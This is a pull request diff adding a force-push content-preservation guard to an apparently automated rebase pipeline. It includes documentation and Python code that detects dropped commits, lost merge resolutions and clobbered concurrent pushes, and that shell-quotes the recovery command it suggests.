### PR TITLE
feat(git): force-push content-preservation guard for the rebase pipeline

### DIFF
--- a/docs/architecture/github-and-trackers.md
+++ b/docs/architecture/github-and-trackers.md
@@ -64,17 +64,23 @@ After confirmed incidents of both, every rebase-pipeline force-push is now
 followed by a detection harness (`koan/app/force_push_guard.py`; contract in
 `specs/components/git-github.md`):
 
-- **Before the push** the remote branch tip is snapshotted (`git ls-remote`)
-  and fetched, so a concurrent human push is known — and recoverable — before
-  it gets overwritten. The fetch also refreshes the tracking ref, making the
-  subsequent `--force-with-lease` compare against the freshest observation.
-- **After the pipeline's last push** (private-gate fixes included) the guard
-  compares the pre-rebase PR head against what was pushed: `git cherry`
-  patch-id equivalence (changes that landed upstream count as preserved), a
-  file-level cross-check for changes that vanished from the PR diff entirely,
-  the list of clobbered concurrent commits, and a final `ls-remote` to detect
-  a push that raced in right after ours — the window that cannot be closed
-  client-side, only detected.
+- **Before every pipeline push** (the main push *and* any private-gate
+  re-push, whose observations are fed back via `push_state`) the remote branch
+  tip is snapshotted (`git ls-remote`) and fetched, so a concurrent human push
+  is known — and recoverable — before it gets overwritten. The fetch also
+  refreshes the tracking ref, making the subsequent `--force-with-lease`
+  compare against the freshest observation.
+- **After the pipeline's last push** the guard compares the pre-rebase PR head
+  against the last SHA actually pushed (never bare local HEAD, so an unpushed
+  gate commit can't skew the result): `git cherry` patch-id screening refined
+  by content-level survival checks — a commit whose files are byte-identical
+  at both heads (upstream squash-merge) or whose added lines all exist
+  verbatim at the pushed head (context-line drift) counts as preserved — plus
+  a file-level cross-check for changes that vanished from the PR diff
+  entirely, the list of clobbered concurrent commits, and a final `ls-remote`
+  to detect a push that raced in right after ours — the window that cannot be
+  closed client-side, only detected. Per-commit analysis is capped and the cap
+  is reported, never silent.
 - **Findings render as one alert** (`build_alert`) at the top of the rebase PR
   comment — CAUTION (red) when content was lost or a concurrent push was
   overwritten, WARNING (amber) when patches were only reshaped in-flight or

--- a/docs/architecture/github-and-trackers.md
+++ b/docs/architecture/github-and-trackers.md
@@ -69,23 +69,42 @@ followed by a detection harness (`koan/app/force_push_guard.py`; contract in
   tip is snapshotted (`git ls-remote`) and fetched, so a concurrent human push
   is known — and recoverable — before it gets overwritten. The fetch also
   refreshes the tracking ref, making the subsequent `--force-with-lease`
-  compare against the freshest observation.
+  compare against the freshest observation. If that lease is *rejected*, the
+  remote moved since the snapshot and the plain `--force` fallback is about to
+  overwrite whatever moved it — so the tip is observed again first, otherwise
+  the clobbered commits could never be named.
 - **After the pipeline's last push** the guard compares the pre-rebase PR head
-  against the last SHA actually pushed (never bare local HEAD, so an unpushed
-  gate commit can't skew the result): `git cherry` patch-id screening refined
-  by content-level survival checks — a commit whose files are byte-identical
-  at both heads (upstream squash-merge) or whose added lines all exist
-  verbatim at the pushed head (context-line drift) counts as preserved — plus
-  a file-level cross-check for changes that vanished from the PR diff
-  entirely, the list of clobbered concurrent commits, and a final `ls-remote`
-  to detect a push that raced in right after ours — the window that cannot be
-  closed client-side, only detected. Per-commit analysis is capped and the cap
-  is reported, never silent.
+  against the last SHA actually pushed. That SHA is captured before the push
+  and kept only on success; with no confirmed value the guard skips rather
+  than falling back to local HEAD, which may hold commits the remote never
+  received. The comparison is `git cherry` patch-id screening — plus a
+  separate pass over the PR's **merge commits**, which `git cherry` never
+  reports and a plain rebase replays away, so a conflict resolution living
+  only inside a merge would otherwise vanish unseen (their combined `--cc`
+  diff is exactly the content unique to the merge) — refined by content-level
+  survival checks: a commit whose files are byte-identical at both heads
+  (upstream squash-merge) or whose added lines are not *removed* by the
+  old→pushed diff (context-line drift) counts as preserved. Checking the
+  removed side, rather than looking each added line up anywhere in the file,
+  is what stops an identical line elsewhere in the same file from masking a
+  reverted change. Anything the guard cannot evaluate — an unreadable file
+  list, a deletion-only commit, any git failure — is reported as unverified
+  rather than cleared. On top of that come a file-level cross-check for
+  changes that vanished from the PR diff entirely, the list of clobbered
+  concurrent commits, and a
+  final `ls-remote` to detect a push that raced in right after ours — the
+  window that cannot be closed client-side, only detected. Per-commit analysis
+  is capped and the cap is reported, never silent.
 - **Findings render as one alert** (`build_alert`) at the top of the rebase PR
   comment — CAUTION (red) when content was lost or a concurrent push was
   overwritten, WARNING (amber) when patches were only reshaped in-flight or
-  the remote raced us — plus a Telegram/Slack notification. The alert always
-  names the pre-rebase head SHA with a copy-pasteable recovery command.
+  the remote raced us — plus a Telegram/Slack notification sent through the
+  un-gated outcome channel, so a safety finding still reaches you in normal
+  messaging mode. The alert always names the pre-rebase head SHA with a
+  copy-pasteable recovery command. Because that command is meant to be pasted
+  into a shell and git ref names may legally contain `$()`, backticks, `;` and
+  `&`, every argument is shell-quoted and the backup branch is derived from the
+  SHA — no branch-controlled text ever reaches it.
 
 The guard **detects and warns; it never blocks or reverts**. It is best-effort
 by contract: any internal failure logs, appends a "guard skipped" action, and

--- a/docs/architecture/github-and-trackers.md
+++ b/docs/architecture/github-and-trackers.md
@@ -4,7 +4,7 @@ title: "GitHub And Trackers"
 description: "Covers GitHub/Jira notification flow, PR workflows (footer, receiving-code-review protocol), review issue-tracker enrichment, and the instance/ tracker files used to dedupe work."
 tags: [architecture]
 created: 2026-05-28
-updated: 2026-07-19
+updated: 2026-08-14
 ---
 
 # GitHub And Trackers
@@ -54,6 +54,36 @@ request is incorrect — while complying when the human insists. Trivial/mechani
 feedback takes a fast-path. The review-learning extraction additionally records
 pushback outcomes (validated vs. overridden) so the agent learns which pushbacks to
 trust.
+
+### Force-push content-preservation guard
+
+A `/rebase` ends in a force-push, and a force-push can silently lose work: a
+bad rebase can drop or reshape commits the PR previously carried, and a commit
+someone pushes to the branch *while* the rebase is running gets erased outright.
+After confirmed incidents of both, every rebase-pipeline force-push is now
+followed by a detection harness (`koan/app/force_push_guard.py`; contract in
+`specs/components/git-github.md`):
+
+- **Before the push** the remote branch tip is snapshotted (`git ls-remote`)
+  and fetched, so a concurrent human push is known — and recoverable — before
+  it gets overwritten. The fetch also refreshes the tracking ref, making the
+  subsequent `--force-with-lease` compare against the freshest observation.
+- **After the pipeline's last push** (private-gate fixes included) the guard
+  compares the pre-rebase PR head against what was pushed: `git cherry`
+  patch-id equivalence (changes that landed upstream count as preserved), a
+  file-level cross-check for changes that vanished from the PR diff entirely,
+  the list of clobbered concurrent commits, and a final `ls-remote` to detect
+  a push that raced in right after ours — the window that cannot be closed
+  client-side, only detected.
+- **Findings render as one alert** (`build_alert`) at the top of the rebase PR
+  comment — CAUTION (red) when content was lost or a concurrent push was
+  overwritten, WARNING (amber) when patches were only reshaped in-flight or
+  the remote raced us — plus a Telegram/Slack notification. The alert always
+  names the pre-rebase head SHA with a copy-pasteable recovery command.
+
+The guard **detects and warns; it never blocks or reverts**. It is best-effort
+by contract: any internal failure logs, appends a "guard skipped" action, and
+lets the rebase finish normally.
 
 ## Mission status indicators (`koan/mission`)
 

--- a/docs/architecture/github-and-trackers.md
+++ b/docs/architecture/github-and-trackers.md
@@ -72,7 +72,10 @@ followed by a detection harness (`koan/app/force_push_guard.py`; contract in
   compare against the freshest observation. If that lease is *rejected*, the
   remote moved since the snapshot and the plain `--force` fallback is about to
   overwrite whatever moved it — so the tip is observed again first, otherwise
-  the clobbered commits could never be named.
+  the clobbered commits could never be named. Observations belong to the remote
+  they were taken on: the push tries several remotes in turn, and tips seen on
+  one whose push then failed are dropped, since that branch was never
+  overwritten and reporting it would be a false alarm.
 - **After the pipeline's last push** the guard compares the pre-rebase PR head
   against the last SHA actually pushed. That SHA is captured before the push
   and kept only on success; with no confirmed value the guard skips rather
@@ -106,9 +109,17 @@ followed by a detection harness (`koan/app/force_push_guard.py`; contract in
   `&`, every argument is shell-quoted and the backup branch is derived from the
   SHA — no branch-controlled text ever reaches it.
 
+A check that could not run at all — an `ls-remote` outage before or after the
+push — is listed in the alert as an explicitly **unverified** check. "Could
+not look" is not "nothing was there", and a safety check that silently did not
+happen is worse than one that says so.
+
 The guard **detects and warns; it never blocks or reverts**. It is best-effort
 by contract: any internal failure logs, appends a "guard skipped" action, and
-lets the rebase finish normally.
+lets the rebase finish normally. That boundary covers the whole call site, not
+just the git operations — by the time the guard runs the branch has already
+been rewritten, so an unexpected bug inside it must never turn a completed
+rebase into a failed mission or skip the PR comment that follows.
 
 ## Mission status indicators (`koan/mission`)
 

--- a/docs/architecture/github-and-trackers.md
+++ b/docs/architecture/github-and-trackers.md
@@ -119,7 +119,10 @@ by contract: any internal failure logs, appends a "guard skipped" action, and
 lets the rebase finish normally. That boundary covers the whole call site, not
 just the git operations — by the time the guard runs the branch has already
 been rewritten, so an unexpected bug inside it must never turn a completed
-rebase into a failed mission or skip the PR comment that follows.
+rebase into a failed mission or skip the PR comment that follows. It also
+covers the part of the guard that runs *on* the push path: a failed pre-push
+observation degrades to "clobber check unverified", never to a push that
+silently does not happen or lands on a fallback remote instead.
 
 ## Mission status indicators (`koan/mission`)
 

--- a/koan/app/claude_step.py
+++ b/koan/app/claude_step.py
@@ -1409,11 +1409,22 @@ def _owner_token_push(remote: str, branch: str, project_path: str) -> bool:
     return False
 
 
-def _force_push(remote: str, branch: str, project_path: str) -> None:
+def _force_push(
+    remote: str,
+    branch: str,
+    project_path: str,
+    on_lease_failure: Optional[Callable[[], None]] = None,
+) -> None:
     """Force-push branch, trying --force-with-lease first then --force.
 
     On a permission failure (e.g. the PR branch lives on another logged-in gh
     account's fork) it retries once with that account's token before giving up.
+
+    *on_lease_failure* is invoked between the two attempts. A rejected lease
+    usually means the remote moved since the last fetch, and the plain
+    ``--force`` fallback is about to overwrite whatever moved it — this is the
+    hook the content-preservation guard uses to observe (and so be able to
+    name) that tip before it is gone.
 
     Raises on total failure.
     """
@@ -1425,6 +1436,11 @@ def _force_push(remote: str, branch: str, project_path: str) -> None:
         return
     except Exception as e:
         print(f"[claude_step] --force-with-lease failed, falling back to --force: {e}", file=sys.stderr)
+    if on_lease_failure is not None:
+        try:
+            on_lease_failure()
+        except Exception as e:
+            print(f"[claude_step] lease-failure hook failed: {e}", file=sys.stderr)
     try:
         _run_git(
             ["git", "push", remote, branch, "--force"],

--- a/koan/app/claude_step.py
+++ b/koan/app/claude_step.py
@@ -1424,7 +1424,9 @@ def _force_push(
     usually means the remote moved since the last fetch, and the plain
     ``--force`` fallback is about to overwrite whatever moved it — this is the
     hook the content-preservation guard uses to observe (and so be able to
-    name) that tip before it is gone.
+    name) that tip before it is gone. The hook owns its own error handling and
+    telemetry (see ``rebase_pr._push_to_remote``); the ``except`` below is only
+    a backstop so a hook can never break a push it merely observes.
 
     Raises on total failure.
     """

--- a/koan/app/force_push_guard.py
+++ b/koan/app/force_push_guard.py
@@ -21,19 +21,34 @@ Checks performed by :func:`verify_content_preserved`:
    of the old PR head that has no patch-id equivalent in the new history.
    Patch-id equivalence alone is too strict (an upstream squash-merge or mere
    context-line drift breaks it on perfectly clean rebases), so a marked
-   commit is only reported when content-level cross-checks also fail: its
-   files' bytes differ between the old and the pushed head, AND at least one
-   line it added is no longer present verbatim at the pushed head. A surviving
-   report is *dropped* when the commit's files vanished from the new PR diff
-   entirely, otherwise *modified in-flight* (e.g. reshaped by conflict
-   resolution) and listed for human verification.
-2. **Clobbered concurrent pushes** — the remote tip is observed immediately
+   commit is only reported when content-level cross-checks also fail: the
+   old→pushed diff restricted to the commit's files is non-empty AND that
+   diff *removes* at least one line the commit added (i.e. the change was
+   undone, not merely shifted). A surviving report is *dropped* when the
+   commit's files vanished from the new PR diff entirely, otherwise *modified
+   in-flight* (e.g. reshaped by conflict resolution) and listed for human
+   verification. Anything the checks cannot evaluate (unreadable file list,
+   deletion-only/binary commit, git failure) stays flagged — the guard never
+   converts its own blind spot into a clean bill of health.
+2. **Lost merge resolutions** — the pipeline rebases without
+   `--rebase-merges`, so a merge commit on the PR is replayed as its ordinary
+   first-parent commits and any conflict-resolution content unique to the
+   merge is silently discarded. `git cherry` never emits merge commits, so
+   they are enumerated separately (`rev-list --merges`) and screened through
+   the same content checks using their combined diff (`diff-tree --cc`),
+   which by construction contains exactly the lines that differ from *every*
+   parent. Trivial merges (empty combined diff) carry no unique content and
+   are skipped.
+3. **Clobbered concurrent pushes** — the remote tip is observed immediately
    before every force-push of the pipeline (step-6 push and any private-gate
-   re-push; see :func:`observe_remote_head`). If an observed tip is neither
+   re-push; see :func:`observe_remote_head`) — and again when
+   `--force-with-lease` is rejected, since the rejection itself means the
+   remote moved after the first observation and the plain `--force` fallback
+   is about to overwrite whatever moved it. If an observed tip is neither
    the pre-rebase head nor part of the pushed history, someone pushed
    mid-pipeline and the force-push erased their commits; they are listed by
    SHA and subject.
-3. **Post-push race** — a final `ls-remote` after the push; if the remote no
+4. **Post-push race** — a final `ls-remote` after the push; if the remote no
    longer points at the last SHA Kōan actually pushed, someone force-pushed
    right after us and Kōan's own rebase may have been overwritten. The
    comparison uses the recorded pushed SHA, not local HEAD, so a local commit
@@ -41,10 +56,12 @@ Checks performed by :func:`verify_content_preserved`:
 """
 
 import contextlib
+import re
+import shlex
 import subprocess
 import sys
 from dataclasses import dataclass, field
-from typing import List, Optional, Set
+from typing import List, Optional, Set, Tuple
 
 from app.git_utils import run_git_strict
 from app.github_alerts import build_alert
@@ -56,6 +73,9 @@ _MAX_LISTED = 10
 _MAX_ANALYZED = 200
 
 _GIT_ERRORS = (RuntimeError, subprocess.TimeoutExpired, OSError, ValueError)
+
+# A SHA safe to embed in a generated branch name without quoting.
+_SHA_RE = re.compile(r"\A[0-9a-fA-F]{7,40}\Z")
 
 
 @dataclass
@@ -125,9 +145,13 @@ def observe_remote_head(remote: str, branch: str, project_path: str) -> str:
     return sha
 
 
+def _merge_base(project_path: str, head: str, target_ref: str) -> str:
+    return _git(project_path, "merge-base", head, target_ref, timeout=30)
+
+
 def _diff_files(project_path: str, head: str, target_ref: str) -> Set[str]:
     """Files changed by the PR at *head* relative to its base fork point."""
-    base = _git(project_path, "merge-base", head, target_ref, timeout=30)
+    base = _merge_base(project_path, head, target_ref)
     out = _git(project_path, "diff", "--name-only", f"{base}..{head}")
     return {line for line in out.splitlines() if line.strip()}
 
@@ -142,6 +166,17 @@ def _cherry_missing(project_path: str, new_head: str, old_head: str) -> List[str
     ]
 
 
+def _merge_commits(project_path: str, base: str, head: str) -> List[str]:
+    """Merge commits in ``base..head`` — invisible to ``git cherry``.
+
+    A plain (non-``--rebase-merges``) rebase replays only the first-parent
+    commits, so any conflict resolution that lives *in* a merge commit is
+    dropped without a trace. They are screened separately for that reason.
+    """
+    out = _git(project_path, "rev-list", "--merges", f"{base}..{head}")
+    return [line.strip() for line in out.splitlines() if line.strip()]
+
+
 def _describe(project_path: str, sha: str) -> str:
     try:
         return _git(
@@ -151,95 +186,139 @@ def _describe(project_path: str, sha: str) -> str:
         return sha[:12]
 
 
-def _commit_files(project_path: str, sha: str) -> Set[str]:
-    try:
-        out = _git(
-            project_path, "diff-tree", "--no-commit-id", "--name-only", "-r", sha,
-        )
-        return {line for line in out.splitlines() if line.strip()}
-    except _GIT_ERRORS:
-        return set()
+def _parent_count(project_path: str, sha: str) -> int:
+    out = _git(project_path, "rev-list", "--parents", "-1", sha, timeout=30)
+    return max(1, len(out.split()) - 1)
 
 
-def _content_unchanged_at_head(
-    project_path: str, files: Set[str], old_head: str, new_head: str,
-) -> bool:
-    """True when every file in *files* is byte-identical at both heads.
+def _commit_files(project_path: str, sha: str, *, merge: bool = False) -> Set[str]:
+    """Files the commit changed. Raises when git cannot answer.
 
-    This is what makes an upstream squash-merge count as preserved: the
-    commit's patch-id has no equivalent anywhere, yet the pushed head carries
-    exactly the content the old PR head carried.
+    For a merge this is the *combined* file list (``--cc``): only files whose
+    content in the merge differs from every parent, i.e. the resolution.
+    A merge that merely replays its parents yields an empty set.
     """
-    out = _git(
-        project_path, "diff", "--name-only", old_head, new_head,
-        "--", *sorted(files),
-    )
-    return not out.strip()
+    args = ["diff-tree", "--no-commit-id", "--name-only", "-r", sha]
+    if merge:
+        args.insert(1, "--cc")
+    out = _git(project_path, *args)
+    return {line for line in out.splitlines() if line.strip()}
 
 
-def _added_lines(project_path: str, sha: str) -> Set[str]:
-    """The non-blank lines a commit added, whitespace-normalized."""
-    out = _git(project_path, "show", "--format=", "--unified=0", sha)
+def _added_lines(project_path: str, sha: str, *, merge: bool = False) -> Set[str]:
+    """The non-blank lines a commit contributed, whitespace-normalized.
+
+    For a merge, the combined diff is used and only lines that differ from
+    *every* parent count (they carry ``+`` in every diff column) — those are
+    the conflict-resolution lines a plain rebase would silently discard.
+    """
+    if merge:
+        columns = _parent_count(project_path, sha)
+        out = _git(
+            project_path, "diff-tree", "--cc", "--no-commit-id", "-r",
+            "--unified=0", sha,
+        )
+    else:
+        columns = 1
+        out = _git(project_path, "show", "--format=", "--unified=0", sha)
+    marker = "+" * columns
     return {
-        line[1:].strip()
+        line[columns:].strip()
         for line in out.splitlines()
-        if line.startswith("+") and not line.startswith("+++") and line[1:].strip()
+        if line.startswith(marker)
+        and not line.startswith("+++")
+        and line[columns:].strip()
     }
 
 
-def _added_lines_survive(
-    project_path: str, sha: str, files: Set[str], pushed_head: str,
+def _content_preserved(
+    project_path: str,
+    sha: str,
+    files: Set[str],
+    old_head: str,
+    pushed_head: str,
+    *,
+    merge: bool = False,
 ) -> bool:
-    """True when every line the commit added still exists at the pushed head.
+    """True when nothing this commit contributed was undone by the rewrite.
 
-    This is what keeps routine context-line drift (upstream edits near a PR
-    hunk shift the patch-id) from producing warnings on clean rebases. A
-    commit with no added lines (deletion-only, binary, mode change) cannot be
-    verified this way and stays flagged — conservative by design.
+    A patch-id miss is not loss by itself. Two ways it is still safe:
+
+    * the commit's files are byte-identical at both heads — the old→pushed
+      diff restricted to them is empty (upstream squash-merge); or
+    * that diff does not *remove* any line the commit added — the hunk only
+      moved or its surroundings changed (context-line drift on a clean
+      rebase). Comparing against the removed side, rather than looking each
+      added line up anywhere in the file, is what stops an identical line
+      elsewhere in the same file from masking a genuinely reverted change.
+
+    A commit that contributed no added lines (deletion-only, binary, mode
+    change) cannot be verified this way and is reported — conservative by
+    design. Git failures propagate; the caller reports them as unverifiable.
     """
-    try:
-        added = _added_lines(project_path, sha)
-    except _GIT_ERRORS:
-        return False
+    diff = _git(
+        project_path, "diff", "--unified=0", old_head, pushed_head,
+        "--", *sorted(files),
+    )
+    if not diff.strip():
+        return True  # content preserved verbatim (e.g. upstream squash)
+    added = _added_lines(project_path, sha, merge=merge)
     if not added:
         return False
-    head_lines: Set[str] = set()
-    for f in sorted(files):
-        with contextlib.suppress(_GIT_ERRORS):
-            blob = _git(project_path, "show", f"{pushed_head}:{f}")
-            head_lines |= {line.strip() for line in blob.splitlines()}
-    return added <= head_lines
+    removed = {
+        line[1:].strip()
+        for line in diff.splitlines()
+        if line.startswith("-") and not line.startswith("---") and line[1:].strip()
+    }
+    return not (added & removed)
 
 
 def _classify_missing_commits(
     project_path: str,
-    missing: List[str],
+    candidates: List[Tuple[str, bool]],
     new_files: Set[str],
     pre_rebase_head: str,
     pushed_head: str,
 ) -> tuple:
-    """Split patch-id-missing commits into (dropped, modified, files_touched).
+    """Split unmatched commits into (dropped, modified, files_touched).
 
-    A missing patch-id alone is not loss — the commit is cleared when its
-    files are byte-identical across both heads (upstream squash-merge) or when
-    every line it added still exists at the pushed head (context drift). What
-    survives those checks is *dropped* when none of its files remain in the
-    new PR diff, otherwise *modified in-flight*.
+    *candidates* are ``(sha, is_merge)`` pairs: patch-id-missing commits from
+    ``git cherry`` plus every merge commit of the pre-rebase range. A commit
+    is cleared only when :func:`_content_preserved` says so; anything the
+    check could not evaluate is reported as *modified* (unverified) rather
+    than silently cleared. What survives is *dropped* when none of its files
+    remain in the new PR diff, otherwise *modified in-flight*.
     """
     dropped: List[str] = []
     modified: List[str] = []
     touched: Set[str] = set()
-    for sha in missing:
-        files = _commit_files(project_path, sha)
+    for sha, is_merge in candidates:
+        try:
+            files = _commit_files(project_path, sha, merge=is_merge)
+        except _GIT_ERRORS as e:
+            print(
+                f"[force_push_guard] file list unavailable for {sha[:12]}: {e}",
+                file=sys.stderr,
+            )
+            modified.append(_describe(project_path, sha))
+            continue
         if not files:
-            continue  # empty commit — rebase legitimately drops these
-        with contextlib.suppress(_GIT_ERRORS):
-            if _content_unchanged_at_head(
-                project_path, files, pre_rebase_head, pushed_head,
-            ):
-                continue  # content preserved verbatim (e.g. upstream squash)
-        if _added_lines_survive(project_path, sha, files, pushed_head):
-            continue  # patch-id drift only — every added line survived
+            # Empty commit, or a merge that resolved nothing of its own —
+            # a rebase legitimately drops these.
+            continue
+        try:
+            preserved = _content_preserved(
+                project_path, sha, files, pre_rebase_head, pushed_head,
+                merge=is_merge,
+            )
+        except _GIT_ERRORS as e:
+            print(
+                f"[force_push_guard] content check failed for {sha[:12]}: {e}",
+                file=sys.stderr,
+            )
+            preserved = False
+        if preserved:
+            continue
         touched |= files
         if files & new_files:
             modified.append(_describe(project_path, sha))
@@ -325,26 +404,43 @@ def verify_content_preserved(
 
     *pushed_head* is the SHA the pipeline last successfully pushed; it is the
     reference for every comparison (a local commit that failed to push must
-    not skew the analysis or fake a race). When empty, falls back to HEAD —
-    the PR branch must then still be checked out. Returns findings (possibly
-    empty — check ran clean), or None when the guard itself could not run.
-    Never raises.
+    not skew the analysis or fake a race). It is **required**: without a
+    confirmed pushed SHA there is nothing trustworthy to compare against —
+    local HEAD may carry commits that never reached the remote — so the guard
+    reports itself skipped (None) rather than analyzing the wrong tree.
+    Returns findings (possibly empty — check ran clean), or None when the
+    guard itself could not run. Never raises.
     """
+    if not pushed_head:
+        print(
+            "[force_push_guard] no confirmed pushed SHA — guard skipped",
+            file=sys.stderr,
+        )
+        return None
     try:
-        if not pushed_head:
-            pushed_head = _git(project_path, "rev-parse", "HEAD", timeout=30)
         old_files = _diff_files(project_path, pre_rebase_head, target_ref)
         new_files = _diff_files(project_path, pushed_head, target_ref)
-        missing = _cherry_missing(project_path, pushed_head, pre_rebase_head)
-        truncated = max(0, len(missing) - _MAX_ANALYZED)
+        candidates = [
+            (sha, False)
+            for sha in _cherry_missing(project_path, pushed_head, pre_rebase_head)
+        ]
+        candidates += [
+            (sha, True)
+            for sha in _merge_commits(
+                project_path,
+                _merge_base(project_path, pre_rebase_head, target_ref),
+                pre_rebase_head,
+            )
+        ]
+        truncated = max(0, len(candidates) - _MAX_ANALYZED)
         if truncated:
             print(
-                f"[force_push_guard] analysis capped: {len(missing)} patch-id "
-                f"misses, analyzing first {_MAX_ANALYZED}",
+                f"[force_push_guard] analysis capped: {len(candidates)} "
+                f"unmatched commits, analyzing first {_MAX_ANALYZED}",
                 file=sys.stderr,
             )
         dropped, modified, touched = _classify_missing_commits(
-            project_path, missing[:_MAX_ANALYZED], new_files,
+            project_path, candidates[:_MAX_ANALYZED], new_files,
             pre_rebase_head, pushed_head,
         )
         return PushGuardFindings(
@@ -370,26 +466,50 @@ def verify_content_preserved(
         return None
 
 
-def _listed(items: List[str]) -> List[str]:
-    """Render '<sha> <subject>' entries as indented bullets, capped.
+def _code(text: str) -> str:
+    """Render attacker-influenced text as a code span it cannot escape.
 
-    Subjects are attacker-influenced (anyone who can commit controls them), so
-    they are rendered inside code spans — GitHub does not linkify, mention, or
-    interpret markdown there. Embedded backticks are squashed so a subject
-    cannot break out of its span.
+    Commit subjects, branch names and paths are all controlled by whoever can
+    push. Inside a code span GitHub does not linkify, mention, or interpret
+    markdown; embedded backticks are squashed so the span cannot be
+    terminated early.
     """
+    return f"`{text.replace('`', chr(39))}`"
+
+
+def _recovery_command(remote: str, sha: str) -> str:
+    """A copy-pasteable recovery command with no injectable input.
+
+    A maintainer is expected to paste this into a shell, so nothing
+    attacker-controlled may reach it unquoted: git ref names legally contain
+    ``$()``, backticks, ``;`` and ``&``. The remote is shell-quoted and the
+    backup branch is derived from the (validated) SHA rather than from the PR
+    branch name, so the command carries no PR-controlled text at all.
+    """
+    safe_sha = sha if _SHA_RE.match(sha) else ""
+    backup = f"koan-prerebase-{safe_sha[:12]}" if safe_sha else "koan-prerebase-backup"
+    return (
+        f"git fetch {shlex.quote(remote)} {shlex.quote(sha)} && "
+        f"git switch -c {backup} FETCH_HEAD"
+    )
+
+
+def _listed(items: List[str]) -> List[str]:
+    """Render '<sha> <subject>' entries as indented bullets, capped."""
     shown = []
     for item in items[:_MAX_LISTED]:
         sha, _, subject = item.partition(" ")
-        subject = subject.replace("`", "'").strip()
-        shown.append(f"  - `{sha}` `{subject}`" if subject else f"  - `{sha}`")
+        subject = subject.strip()
+        shown.append(
+            f"  - {_code(sha)} {_code(subject)}" if subject else f"  - {_code(sha)}"
+        )
     if len(items) > _MAX_LISTED:
         shown.append(f"  - … and {len(items) - _MAX_LISTED} more")
     return shown
 
 
 def _listed_files(files: List[str]) -> str:
-    rendered = ", ".join(f"`{f}`" for f in files[:_MAX_LISTED])
+    rendered = ", ".join(_code(f) for f in files[:_MAX_LISTED])
     if len(files) > _MAX_LISTED:
         rendered += f", … and {len(files) - _MAX_LISTED} more"
     return rendered
@@ -412,7 +532,8 @@ def build_push_warning(
     if findings is None or not findings.has_findings:
         return ""
     lines: List[str] = [
-        f"**Force-push safety check — the rewrite of `{branch}` needs attention.**",
+        f"**Force-push safety check — the rewrite of {_code(branch)} needs "
+        f"attention.**",
         "",
     ]
     if findings.dropped_commits:
@@ -448,10 +569,9 @@ def build_push_warning(
         )
     lines.append("")
     lines.append(
-        f"Previous PR head: `{findings.pre_rebase_head}` — everything it "
+        f"Previous PR head: {_code(findings.pre_rebase_head)} — everything it "
         f"contained is recoverable: "
-        f"`git fetch {remote} {findings.pre_rebase_head} && "
-        f"git switch -c {branch}-backup FETCH_HEAD`"
+        + _code(_recovery_command(remote, findings.pre_rebase_head))
     )
     kind = "CAUTION" if findings.is_critical else "WARNING"
     return build_alert(kind, "\n".join(lines), provider=provider)

--- a/koan/app/force_push_guard.py
+++ b/koan/app/force_push_guard.py
@@ -48,11 +48,18 @@ Checks performed by :func:`verify_content_preserved`:
    the pre-rebase head nor part of the pushed history, someone pushed
    mid-pipeline and the force-push erased their commits; they are listed by
    SHA and subject.
+   Only observations of the remote actually pushed to are considered: a tip
+   seen on a remote whose push then failed was never overwritten.
 4. **Post-push race** — a final `ls-remote` after the push; if the remote no
    longer points at the last SHA Kōan actually pushed, someone force-pushed
    right after us and Kōan's own rebase may have been overwritten. The
    comparison uses the recorded pushed SHA, not local HEAD, so a local commit
    that failed to push is never misreported as a race.
+
+A check that could not run (either `ls-remote`, an unreadable commit) is
+listed as *unverified* in the alert, never folded into the clean case: the
+guard's job is to say what it knows, and "could not look" is not "nothing
+there".
 """
 
 import contextlib
@@ -93,6 +100,10 @@ class PushGuardFindings:
     clobbered_commits: List[str] = field(default_factory=list)
     remote_head_now: str = ""  # set only when the remote moved after our push
     analysis_truncated: int = 0  # patch-id misses beyond the analysis cap
+    # Checks the guard could not perform. A check that did not run must never
+    # read as a check that passed, so these are surfaced (amber) rather than
+    # collapsed into the clean case.
+    unverified_checks: List[str] = field(default_factory=list)
 
     @property
     def has_findings(self) -> bool:
@@ -103,6 +114,7 @@ class PushGuardFindings:
             or self.clobbered_commits
             or self.remote_head_now
             or self.analysis_truncated
+            or self.unverified_checks
         )
 
     @property
@@ -117,16 +129,24 @@ def _git(project_path: str, *args: str, timeout: int = 60) -> str:
     return run_git_strict(*args, cwd=project_path, timeout=timeout)
 
 
-def observe_remote_head(remote: str, branch: str, project_path: str) -> str:
+def observe_remote_head(
+    remote: str, branch: str, project_path: str,
+) -> Optional[str]:
     """Snapshot the remote branch tip immediately before a force-push.
 
-    Returns the SHA the remote currently serves for *branch* ("" when the
-    observation fails — the guard then simply skips the clobber check).
+    Returns the SHA the remote currently serves for *branch*, ``""`` when the
+    remote has no such branch (nothing to clobber), or **None** when the
+    observation itself failed — the caller must surface that as an unverified
+    check, because "could not look" is not "nothing was there".
+
     On success the branch is also fetched so the commits are available
     locally for post-push analysis (at observation time they are still
     reachable; after the force-push they may not be). The fetch also
     refreshes ``refs/remotes/<remote>/<branch>``, so a subsequent
-    ``--force-with-lease`` compares against this freshest observation.
+    ``--force-with-lease`` compares against this freshest observation. A
+    failed fetch is logged and left non-fatal: the tip SHA is still known, and
+    the clobber check names it explicitly when its objects turn out to be
+    unavailable locally.
     """
     try:
         out = _git(
@@ -134,13 +154,19 @@ def observe_remote_head(remote: str, branch: str, project_path: str) -> str:
         )
     except _GIT_ERRORS as e:
         print(f"[force_push_guard] pre-push ls-remote failed: {e}", file=sys.stderr)
-        return ""
+        return None
     sha = out.split()[0] if out.split() else ""
     if sha:
-        with contextlib.suppress(_GIT_ERRORS):
+        try:
             _git(
                 project_path, "fetch", remote,
                 f"+refs/heads/{branch}:refs/remotes/{remote}/{branch}",
+            )
+        except _GIT_ERRORS as e:
+            print(
+                f"[force_push_guard] observation fetch of {sha[:12]} failed "
+                f"(clobber analysis will name the tip without its commits): {e}",
+                file=sys.stderr,
             )
     return sha
 
@@ -381,10 +407,15 @@ def _clobbered_commits(
 
 def _remote_moved_after_push(
     project_path: str, push_remote: str, branch: str, pushed_head: str,
-) -> str:
-    """Final post-push check: does the remote still point at what we pushed?"""
+) -> Optional[str]:
+    """Final post-push check: does the remote still point at what we pushed?
+
+    Returns the remote's SHA when it moved, ``""`` when it still matches, and
+    **None** when the check could not run — an outage of the race check must
+    not render as "no race".
+    """
     if not push_remote or not branch:
-        return ""
+        return None
     try:
         out = _git(
             project_path, "ls-remote", push_remote, f"refs/heads/{branch}",
@@ -392,9 +423,11 @@ def _remote_moved_after_push(
         )
     except _GIT_ERRORS as e:
         print(f"[force_push_guard] post-push ls-remote failed: {e}", file=sys.stderr)
-        return ""
+        return None
